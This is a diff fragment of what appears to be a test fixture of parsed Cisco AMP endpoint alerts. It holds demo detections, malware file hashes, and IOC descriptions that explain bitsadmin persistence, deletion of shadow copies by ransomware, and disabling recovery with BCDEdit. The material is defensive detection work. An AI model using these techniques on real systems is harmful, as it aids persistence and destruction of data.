"Demo_Qakbot_1" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:15:29.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + 
"cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "24:78:d8:fd:c4:75" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 553648130, + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "24:78:d8:fd:c4:75" + ], + "cisco.amp.timestamp_nanoseconds": 596000000, + "event.action": "Policy Update", + "event.dataset": "cisco.amp", + "event.id": 6533243623469744000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 0, + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Quarantined", + "host.name": "Demo_AMP_Threat_Quarantined", + "input.type": "log", + "log.offset": 1358, + "related.hosts": [ + "Demo_AMP_Threat_Quarantined" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:06:39.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "24:78:d8:fd:c4:75" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Overdrive.RET", + "cisco.amp.detection_id": "6533241347137077251", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "24:78:d8:fd:c4:75" + ], + "cisco.amp.timestamp_nanoseconds": 657000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533241347137077000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "0fe5be3811a98ee6a9c997d3812d911a", + "file.hash.sha1": 
"cf162622e29bca072d01b274fbbc3ceaacdd13c7", + "file.hash.sha256": "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850", + "file.name": "BIT657.tmp", + "file.path": "\\\\?\\C:\\BIT657.tmp", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Quarantined", + "host.name": "Demo_AMP_Threat_Quarantined", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 2295, + "process.hash.md5": "54a47f6b5e09a77e61649109c6a08866", + "process.hash.sha1": "4af001b3c3816b860660cf2de2c0fd3c1dfb4878", + "process.hash.sha256": "121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2", + "process.name": "svchost.exe", + "process.pid": 896, + "related.hash": [ + "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850", + "0fe5be3811a98ee6a9c997d3812d911a", + "cf162622e29bca072d01b274fbbc3ceaacdd13c7" + ], + "related.hosts": [ + "Demo_AMP_Threat_Quarantined" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:06:39.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "24:78:d8:fd:c4:75" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6533241347137077251", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "24:78:d8:fd:c4:75" + ], + "cisco.amp.timestamp_nanoseconds": 657000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533241347137077000, + "event.kind": "alert", + 
"event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Quarantined", + "host.name": "Demo_AMP_Threat_Quarantined", + "input.type": "log", + "log.offset": 3885, + "related.hash": [ + "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850" + ], + "related.hosts": [ + "Demo_AMP_Threat_Quarantined" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:05:52.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "24:78:d8:fd:c4:75" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6533241145273614337", + "cisco.amp.error.description": "Object name not found", + "cisco.amp.error.error_code": 3221225524, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "24:78:d8:fd:c4:75" + ], + "cisco.amp.timestamp_nanoseconds": 525000000, + "event.action": "Quarantine Failure", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533241145273614000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Quarantined", + "host.name": "Demo_AMP_Threat_Quarantined", + "input.type": "log", + "log.offset": 5008, + "related.hash": [ + "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850" + ], + "related.hosts": [ + "Demo_AMP_Threat_Quarantined" + ], + "related.ip": [ + "8.8.8.8", + 
"10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:05:52.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "24:78:d8:fd:c4:75" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Overdrive.RET", + "cisco.amp.detection_id": "6533241145273614338", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "24:78:d8:fd:c4:75" + ], + "cisco.amp.timestamp_nanoseconds": 619000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533241145273614000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.md5": "0fe5be3811a98ee6a9c997d3812d911a", + "file.hash.sha1": "cf162622e29bca072d01b274fbbc3ceaacdd13c7", + "file.hash.sha256": "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850", + "file.name": "SqGGuYXyy.exe", + "file.path": "\\\\?\\C:\\SqGGuYXyy.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Quarantined", + "host.name": "Demo_AMP_Threat_Quarantined", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 6204, + "process.hash.md5": "54a47f6b5e09a77e61649109c6a08866", + "process.hash.sha1": "4af001b3c3816b860660cf2de2c0fd3c1dfb4878", + "process.hash.sha256": "121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2", + "process.name": "svchost.exe", + "process.pid": 896, + "related.hash": [ + "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850", + 
"0fe5be3811a98ee6a9c997d3812d911a", + "cf162622e29bca072d01b274fbbc3ceaacdd13c7" + ], + "related.hosts": [ + "Demo_AMP_Threat_Quarantined" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:05:52.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "24:78:d8:fd:c4:75" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "W32.Overdrive.RET", + "cisco.amp.detection_id": "6533241145273614337", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "24:78:d8:fd:c4:75" + ], + "cisco.amp.timestamp_nanoseconds": 525000000, + "event.action": "Threat Detected", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533241145273614000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850", + "file.name": "BIT4BBF.tmp", + "file.path": "\\\\?\\C:\\BIT4BBF.tmp", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Quarantined", + "host.name": "Demo_AMP_Threat_Quarantined", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 7800, + "process.hash.md5": "54a47f6b5e09a77e61649109c6a08866", + "process.hash.sha1": "4af001b3c3816b860660cf2de2c0fd3c1dfb4878", + "process.hash.sha256": "121118a0f5e0e8c933efd28c9901e54e42792619a8a3a6d11e1f0025a7324bc2", + "process.name": "svchost.exe", + "process.pid": 
896, + "related.hash": [ + "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850" + ], + "related.hosts": [ + "Demo_AMP_Threat_Quarantined" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:05:52.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "24:78:d8:fd:c4:75" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6533241145273614338", + "cisco.amp.event_type_id": 553648143, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "24:78:d8:fd:c4:75" + ], + "cisco.amp.timestamp_nanoseconds": 619000000, + "event.action": "Threat Quarantined", + "event.category": [ + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 6533241145273614000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Quarantined", + "host.name": "Demo_AMP_Threat_Quarantined", + "input.type": "log", + "log.offset": 9301, + "related.hash": [ + "a78c29d1fa05c2b23d1dc9b75da8c053399143682fe3779bc466f10e1a997850" + ], + "related.hosts": [ + "Demo_AMP_Threat_Quarantined" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:05:50.000Z", + "cisco.amp.cloud_ioc.description": "The Windows Scripting Host (WScript.exe) was used to execute a file with a fake benign extension prior to a scripting extension. 
This is indicative of an attempt to conceal the malicious intent of the file and to trick the user into opening it.", + "cisco.amp.cloud_ioc.short_description": "W32.WScriptExecuteFakeExtension.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "24:78:d8:fd:c4:75" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "24:78:d8:fd:c4:75" + ], + "cisco.amp.timestamp_nanoseconds": 875739000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 1521138739875754000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "event.start": "2021-01-14T10:05:50.000Z", + "file.hash.sha256": "047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0", + "file.name": "WScript.exe", + "file.path": "/C:/Windows/System32/WScript.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Quarantined", + "host.name": "Demo_AMP_Threat_Quarantined", + "input.type": "log", + "log.offset": 10424, + "process.hash.sha256": "0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894", + "related.hash": [ + "047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0" + ], + "related.hosts": [ + "Demo_AMP_Threat_Quarantined" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:05:50.000Z", + "cisco.amp.cloud_ioc.description": "Bitsadmin is a command-line tool that can be used to create, download or upload jobs and monitor their progress. 
However, it can also be used to maintain persistence and evade checks for usual persistence mechanisms. An attacker with Administrator's rights can use the setnotifycmdline option to create a persistent job and then specify a /Resume option at a later time to execute the job. This mechanism allows the malware to survive reboots since the job is run repeatedly after a system restart. Moreover, Bitsadmin by default downloads files unless the destination server is running IIS with the required server component and /UPLOAD is specified in the command-line. While this is not by itself malicious, the command-line needs to be reviewed to ascertain the origin and intent.", + "cisco.amp.cloud_ioc.short_description": "W32.Bitsadmin.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "24:78:d8:fd:c4:75" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "24:78:d8:fd:c4:75" + ], + "cisco.amp.timestamp_nanoseconds": 868146000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 1521138739868158500, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "event.start": "2021-01-14T10:05:50.000Z", + "file.hash.sha256": "838670c83e6d1984d0c46e39c196028d292b3a6d2df96183f2f6e408f1a16e00", + "file.name": "bitsadmin.exe", + "file.path": "/C:/Windows/System32/bitsadmin.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Quarantined", + "host.name": "Demo_AMP_Threat_Quarantined", + "input.type": "log", + "log.offset": 12096, + "process.hash.sha256": 
"047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0", + "related.hash": [ + "838670c83e6d1984d0c46e39c196028d292b3a6d2df96183f2f6e408f1a16e00" + ], + "related.hosts": [ + "Demo_AMP_Threat_Quarantined" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:05:50.000Z", + "cisco.amp.cloud_ioc.description": "Windows Script Host (wscript.exe) was used to execute a JavaScript file inside a zip archive. This attack vector is increasingly being used by ransomware. This may not be necessarily malicious but it needs further investigation to determine if the executed JavaScript is indeed malicious.", + "cisco.amp.cloud_ioc.short_description": "W32.WScriptLaunchedZippedJS.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "24:78:d8:fd:c4:75" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "24:78:d8:fd:c4:75" + ], + "cisco.amp.timestamp_nanoseconds": 846943000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 1521138739846959000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "event.start": "2021-01-14T10:05:50.000Z", + "file.hash.sha256": "047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0", + "file.name": "WScript.exe", + "file.path": "/C:/Windows/System32/WScript.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_Threat_Quarantined", + "host.name": "Demo_AMP_Threat_Quarantined", + "input.type": "log", + "log.offset": 14294, + 
"process.hash.sha256": "0a8ce026714e03e72c619307bd598add5f9b639cfd91437cb8d9c847bf9f6894", + "related.hash": [ + "047f3c5a7ab0ea05f35b2ca8037bf62dd4228786d07707064dbd0d46569305d0" + ], + "related.hosts": [ + "Demo_AMP_Threat_Quarantined" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:04:56.000Z", + "cisco.amp.cloud_ioc.description": "Shadow copies are snapshots of part of the filesystem, used for backups and restore points. Ransomware may delete these to prevent the user from restoring files that it has encrypted or destroyed. Aside from ransomware, shadow copy deletion may also be used by other types of malware to remove forensic evidence of malicious activity.", + "cisco.amp.cloud_ioc.short_description": "W32.PossibleRansomwareShadowCopyDeletion.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 48000000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 1494576726048000300, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "event.start": "2021-01-14T10:04:56.000Z", + "file.hash.sha256": "e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10", + "file.name": "vssadmin.exe", + "file.path": "/C:/windows/system32/vssadmin.exe", + "fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": 
"Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 16006, + "process.hash.sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae", + "related.hash": [ + "e09bf4d27555ec7567a598ba89ccc33667252cef1fb0b604315ea7562d18ad10" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:04:49.000Z", + "cisco.amp.cloud_ioc.description": "The BCDEdit command displays and modifies information about the boot options for Windows Vista and later Windows operating systems. In this case, it was used to disable automatic start up of recovery mode at boot susequent to a failure. Malware, such as ransomware, may use this to prevent the user from booting Windows into a safe mode or recovering a previous setting.", + "cisco.amp.cloud_ioc.short_description": "W32.BCDEditDisableRecovery.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "53:74:31:cb:37:50" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Malicious", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "53:74:31:cb:37:50" + ], + "cisco.amp.timestamp_nanoseconds": 672000000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 1494576727672000300, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 1, + "event.start": "2021-01-14T10:04:49.000Z", + "file.hash.sha256": "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae", + "file.name": "cmd.exe", + "file.path": "/C:/windows/system32/cmd.exe", + 
"fileset.name": "amp", + "host.hostname": "Demo_WannaCry_Ransomware", + "host.name": "Demo_WannaCry_Ransomware", + "input.type": "log", + "log.offset": 17775, + "process.hash.sha256": "b9c5d4339809e0ad9a00d4d3dd26fdf44a32819a54abf846bb9b560d81391c25", + "related.hash": [ + "17f746d82695fa9b35493b41859d39d786d32b23a9d2e00f4011dec7a02402ae" + ], + "related.hosts": [ + "Demo_WannaCry_Ransomware" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:03:40.000Z", + "cisco.amp.cloud_ioc.description": "A file containing a benign extension prior to the .exe extension was executed. This is indicative of suspicious behaviour in an attempt to conceal the malicious intent of the file.", + "cisco.amp.cloud_ioc.short_description": "W32.FakeExtensionExec.RET", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "df:d1:ed:2d:c8:fc" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Malicious", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "df:d1:ed:2d:c8:fc" + ], + "cisco.amp.timestamp_nanoseconds": 791000000, + "event.action": "Cloud IOC", + "event.category": [ + "file", + "malware" + ], + "event.dataset": "cisco.amp", + "event.id": 1458617561791000300, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "event.start": "2021-01-14T10:03:40.000Z", + "file.hash.sha256": "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b", + "file.name": "report.pdf.exe", + "file.path": "/c:/users/rsteadman/downloads/report.pdf.exe", + "fileset.name": "amp", + "host.hostname": "Demo_Low_Prev_Retro", + 
"host.name": "Demo_Low_Prev_Retro", + "input.type": "log", + "log.offset": 19558, + "process.hash.sha256": "93b2ed4004ed5f7f3039dd7ecbd22c7e4e24b6373b4d9ef8d6e45a179b13a5e8", + "related.hash": [ + "d5221f6847978682234cb8ebfa951cb56b1323658679a820b168bbc1f5261a3b" + ], + "related.hosts": [ + "Demo_Low_Prev_Retro" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:01:51.000Z", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "be:b0:d5:89:e2:96" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection_id": "6880587034675642558", + "cisco.amp.error.description": "Object path not found", + "cisco.amp.error.error_code": 3221225530, + "cisco.amp.event_type_id": 2164260880, + "cisco.amp.file.disposition": "Unknown", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "be:b0:d5:89:e2:96" + ], + "cisco.amp.timestamp_nanoseconds": 396000000, + "event.action": "Quarantine Failure", + "event.dataset": "cisco.amp", + "event.id": 6880587034675643000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e", + "fileset.name": "amp", + "host.hostname": "Demo_BP_WMIPRVSE", + "host.name": "Demo_BP_WMIPRVSE", + "input.type": "log", + "log.offset": 21167, + "related.hash": [ + "5c84acc90941b0501acc22ea959b533ddf1e1cbebc57f42e4f8c724bffaf3a6e" + ], + "related.hosts": [ + "Demo_BP_WMIPRVSE" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T10:01:50.000Z", + "cisco.amp.computer.active": true, + 
"cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "be:b0:d5:89:e2:96" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.detection": "Generic.Malware.WX.9E93D282", + "cisco.amp.detection_id": "6880587021790740668", + "cisco.amp.event_type_id": 1090519054, + "cisco.amp.file.disposition": "Unknown", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "be:b0:d5:89:e2:96" + ], + "cisco.amp.timestamp_nanoseconds": 737000000, + "event.action": "Threat Detected", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 6880587030380676000, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "file.hash.sha256": "1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48", + "file.name": "p3fci4nu.dll", + "file.path": "\\\\?\\C:\\Windows\\Temp\\p3fci4nu\\p3fci4nu.dll", + "fileset.name": "amp", + "host.hostname": "Demo_BP_WMIPRVSE", + "host.name": "Demo_BP_WMIPRVSE", + "host.os.family": "windows", + "host.os.platform": "windows", + "host.user.name": "user@testdomain.com", + "input.type": "log", + "log.offset": 27082, + "process.hash.md5": "23ee3d381cfe3b9f6229483e2ce2f9e1", + "process.hash.sha1": "93cf877f5627e55ec076a656e935042fac39950e", + "process.hash.sha256": "4240a12e0b246c9d69af1f697488fe7da1b497df20f4a6f95135b4d5fe180a57", + "process.name": "csc.exe", + "process.pid": 6708, + "related.hash": [ + "1e5d8b8b8e0d8b74643f7a68430f8dc703290190cc60dcdb4f08c9ecae342b48" + ], + "related.hosts": [ + "Demo_BP_WMIPRVSE" + ], + "related.ip": [ + "8.8.8.8", + "10.10.10.10" + ], + "related.user": [ + "user@testdomain.com" + ], + "service.type": "cisco", + "tags": [ + "cisco-amp", + "forwarded" + ] + }, + { + "@timestamp": "2021-01-14T09:56:55.000Z", + "cisco.amp.cloud_ioc.description": "The 
psexec utility was executed as admin.", + "cisco.amp.cloud_ioc.short_description": "W32.PsexecAsAdmin.ioc", + "cisco.amp.computer.active": true, + "cisco.amp.computer.connector_guid": "test_connector_guid", + "cisco.amp.computer.external_ip": "8.8.8.8", + "cisco.amp.computer.network_addresses": [ + { + "ip": "10.10.10.10", + "mac": "04:e6:4d:d5:7a:b5" + } + ], + "cisco.amp.connector_guid": "test_connector_guid", + "cisco.amp.event_type_id": 1107296274, + "cisco.amp.file.disposition": "Clean", + "cisco.amp.file.parent.disposition": "Clean", + "cisco.amp.group_guids": [ + "test_group_guid" + ], + "cisco.amp.related.mac": [ + "04:e6:4d:d5:7a:b5" + ], + "cisco.amp.timestamp_nanoseconds": 615000000, + "event.action": "Cloud IOC", + "event.category": [ + "file" + ], + "event.dataset": "cisco.amp", + "event.id": 460392585524661250, + "event.kind": "alert", + "event.module": "cisco", + "event.severity": 2, + "event.start": "2021-01-14T09:56:55.000Z", + "file.hash.sha256": "3337e3875b05e0bfba69ab926532e3f179e8cfbf162ebb60ce58a0281437a7ef", + "file.name": "PsExec.exe", + "file.path": "file:///C%3A/share%24/PsExec.exe", + "fileset.name": "amp", + "host.hostname": "Demo_AMP_MAP_FriedEx", + "host.name": "Demo_AMP_MAP_FriedEx", + "input.type": "log", + "log.offset": 28604, + 